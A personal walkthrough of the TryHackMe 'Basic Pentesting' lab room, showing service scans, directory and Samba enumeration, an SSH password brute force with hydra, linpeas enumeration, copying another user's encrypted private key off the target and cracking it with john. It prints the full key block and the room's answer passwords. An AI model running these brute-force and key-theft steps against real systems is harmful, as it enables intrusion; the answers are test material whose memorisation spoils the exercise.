Try Hack Me Writeup - Basic Pentesting

• TryHackMe room: https://tryhackme.com/room/basicpentestingjt
• OS: Linux (Ubuntu)

This is a machine that allows you to practise web app hacking and privilege escalation

In this room, there’s some featured youtube video you can follow if you want: https://www.youtube.com/watch?v=xl2Xx5YOKcI

Listen and follow what that nice guy is telling and showing. Subscribe to his channel or so.

Note that what is seen there in the video doesn’t 100% match with what I have seen at the moment of writing this writeup. Like my nmap scan result which shows more open ports. Although I used exactly the same nmap command.

Used Tools

• nmap
• gobuster
• enum4linux
• hydra
• linpeas
• john

Task 1 - Web App Testing and Privilege Escalation

In these set of tasks you’ll learn the following:

• brute forcing
• hash cracking
• service enumeration
• Linux enumeration

The main goal here is to learn as much as possible. Make sure you are connected to our network using your OpenVPN configuration file.

Credits to Josiah Pierce from Vulnhub.

Deploy the machine and connect to our network

No answer needed.

Start the Virtual Machine of Try Hack Me provided into this room.

(temp) IP of the target Virtual Machine: 10.10.206.175

Once the THM virtual machine booted up, I can start to work on my local Kali virtual machine and in the virtual machine start my openvpn connection to connect to the THM network.

Find the services exposed by the machine

No answer needed.

Let’s start with a nmap scan and save the results in ~/nmap_scan_results/initial.

mkdir ~/nmap_scan_results
nmap -sC -sV -oN ~/nmap_scan_results/initial 10.10.206.175

Open Ports:

22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8080/tcp open  http        Apache Tomcat 9.0.7

What is the name of the hidden directory on the web server(enter name without /)?

So let’s see what’s running on the web server. Use web browser and point to http://10.10.206.175.

The page displays a simple message: Undergoing maintenance. Please check later. Without anything else.

When looking to the source code of the page I get some hint: <!-- Check our dev note section if you need to know what to work on. -->.

When trying to go on http://10.10.206.175/dev/ it does give us a 404 but tells use it’s running Apache/2.4.18 (Ubuntu) Server.

My second guess http://10.10.206.175/development/ and there you go.

Content of the dev.txt file:

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm 
using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

Content of the j.txt file:

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.

-K

Anyway let’s scan the web server with gobuster to try to discover hidden files and folders we don’t know, we never know.

But note to read the manual, not the man gobuster as there’s none and the gobuster --help lacks of information to allow make straight use of this application. I could find out the new usage method by looking at the output of dpkg -L gobuster which showed me all the files this package contains.

So let’s read the usage:

zless /usr/share/doc/gobuster/README.md.gz

Launch gobuster now and save the scan result in gobuster_scan_result

gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.206.175/ -o gobuster_scan_result

Gobuster is soooooo slooooooow!

The gobuster output (look into the gobuster_scan_result we asked to create):

/development          (Status: 301) [Size: 320] [--> http://10.10.206.175/development/]
/server-status        (Status: 403) [Size: 301]

User brute-forcing to find the username & password

No answer required.

At this point we don’t know what service to brute-force the password, nor do we have user names. The only thing we know from j.txt is that the password is weak. We first need to continue to investigate as we still don’t have user names so far. We only know that there are 2 user name and one of them start with j and the other one k

Let’s enumerate the Samba server to see what’s up there. We will pipe the output trough tee to make a log file as the output of enum4linux is very long.

enum4linux -a 10.10.206.175 | tee enum4linux.log

After the enumaration on the Samba server is done, we can look into our generated enum4linux.log file. Interesting parts are these:

Found some Anonymous share:

 ==========================================
|    Share Enumeration on 10.10.206.175    |
 ==========================================

        Sharename       Type      Comment
        ---------       ----      -------
        Anonymous       Disk
        IPC$            IPC       IPC Service (Samba Server 4.3.11-Ubuntu)
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.206.175
//10.10.206.175/Anonymous       Mapping: OK, Listing: OK
//10.10.206.175/IPC$    [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

Found 2 usernames:

S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

What is the username?

jan

What is the password?

armando

Will use hydra to bruteforce the ssh server, in the hope there’s no fail2ban system. I will also time the bruteforce, just for curiosity.

time hydra -t 50 -l jan -P /root/rockyou.txt ssh://10.10.206.175

Note that this should be not on the by default compressed rockyou.txt.gz file. Otherwise this will fail.

As hydra is taking a long time to bruteforce both user names, we will try to put some other tasks to run. At this point we have already the password of jan, so let’s try to ssh into that system and try to find some information.

ssh jan@10.10.206.175 with password armando does work :-)

We want to look if there’s no other way to gain more information and access. The linepeas.sh script is ideal for this as it can look for various know privilege escalations.

# Download linpeas to the kali machine as kali does not provide this yet 
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
chmod +x linepeas.sh

# ssh this to the victims computer, as there's no internet access on that THM virtual machine.
# We copy that in the /tmp directory as in this VM victim simulation, /home/jan is not writeable. So let's abuse /tmp
scp /home/itchy/Downloads/linpeas.sh jan@10.10.206.175:/tmp/

# Now let's log back to that victims machine with the account of jan
ssh jan@10.10.206.175
cd /tmp/
chmod +x linpeas.sh

# Make use of that linepeas script to find out some priviledge escalations
./linpeas.sh | tee linpeas.log

Even if we logged the stdout to linpeas.log. It is way more easy to scroll back and look into the console as linpeas make use of colors. And we want to look for things marked in yellow and red in the console output!

Thanks to linpeas.log we found out that /home/kay/.ssh/id_rsa is readable by everyone. Also note that PubkeyAuthentication yes the sshd config allows us to log in with the pubkey.

-rw-r--r-- 1 kay kay 3326 Apr 19  2018 /home/kay/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
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
-----END RSA PRIVATE KEY-----
-rw-r--r-- 1 kay kay 771 Apr 19  2018 /home/kay/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCzAsDwjb0ft4IO7Kyux8DWocNiS1aJqpdVEo+gfk8Ng624b9qOQp7LOWDMVIINfCuzkTA3ZugSyo1OehPc0iyD7SfJIMzsETFvlHB3DlLLeNFm11hNeUBCF4Lt6o9uH3lcTuPVyZAvbAt7xD66bKjyEUy3hrpSnruN+M0exdSjaV54PI9TBFkUmmqpXsrWzMj1QaxBxZMq3xaBxTsFvW2nEx0rPOrnltQM4bdAvmvSXtuxLw6e5iCaAy1eoTHw0N6IfeGvwcHXIlCT25gH1gRfS0/NdR9cs78ylxYTLDnNvkxL1J3cVzVHJ/ZfOOWOCK4iJ/K8PIbSnYsBkSnrIlDX27PM7DZCBu+xhIwV5z4hRwwZZG5VcU+nDZZYr4xtpPbQcIQWYjVwr5vF3vehk57ymIWLwNqU/rSnZ0wZH8MURhVFaNOdr/0184Z1dJZ34u3NbIBxEV9XsjAh/L52Dt7DNHWqUJKIL1/NV96LKDqHKCXCRFBOh9BgqJUIAXoDdWLtBunFKu/tgCz0n7SIPSZDxJDhF4StAhFbGCHP9NIMvB890FjJE/vys/PuY3efX1GjTdAijRa019M2f8d0OnJpktNwCIMxEjvKyGQKGPLtTS8o0UAgLfV50Zuhg7H5j6RAJoSgFOtlosnFzwNuxxU05ozHuJ59wsmn5LMK97sbow== I don't have to type a long password anymore!

So let’s try to make use of this id_rsa key of the user kay to log in without password:

cd /home/kay/.ssh/
ssh -i id_rsa kay@10.10.206.175
Could not create directory '/home/jan/.ssh'.
The authenticity of host '10.10.206.175 (10.10.206.175)' can't be established.
ECDSA key fingerprint is SHA256:+Fk53V/LB+2pn4OPL7GN/DuVHVvO0lT9N4W5ifchySQ.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/jan/.ssh/known_hosts).
Enter passphrase for key 'id_rsa':

No luck in the much luck. This private key is password protected. So we have to try to attempt to crack this with john the ripper. But we don’t have these tools on that victim’s computer. So copy the content of the id_rsa key manually to our kali box cat id_rsa and copy paste that into a new text file something like kay_id_rsa and in theory chmod 600 kay_id_rsa as that is supposed to be only readable by the concerned user.

We can try to crack this with john but we need to prepare the kay_id_rsa file so that john can work with it.

/usr/share/john/ssh2john.py kay_id_rsa > forjohntheripper.txt

john forjohntheripper.txt --wordlist=/usr/share/wordlists/rockyou.txt.gz

So let’s try this:

On the kali machine

systemctl start ssh.socket

On the victims

scp id_rsa itchy@10.8.208.30:/tmp

On the kali machine again and we stay here now:

cp /tmp/id_rsa kay_id_rsa2
/usr/share/john/ssh2john.py kay_id_rsa2 > forjohntheripper2.txt
john forjohntheripper2.txt --wordlist=/usr/share/wordlists/rockyou.txt.gz

This gives the same strange result. Found out because the rockyou.txt.gz is gunziped and apparantly these programs can’t handle it. Do idea why this file is compressed as this is provided this way by Kali.

Let’s try to log in with that rsa key as we have the password now. I will log in with ssh from the victims machine to leave as less as possible traces:

cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Mission accomplished :-)

What service do you use to access the server(answer in abbreviation in all caps)?

Hint: what command line utility is used for remote access?

SSH

Enumerate the machine to find any vectors for privilege escalation

No answer needed

What is the name of the other user you found(all lower case)?

kay

If you have found another user, what can you do with this information?

No answer needed

What is the final password you obtain?

heresareallystrongpasswordthatfollowsthepasswordpolicy$$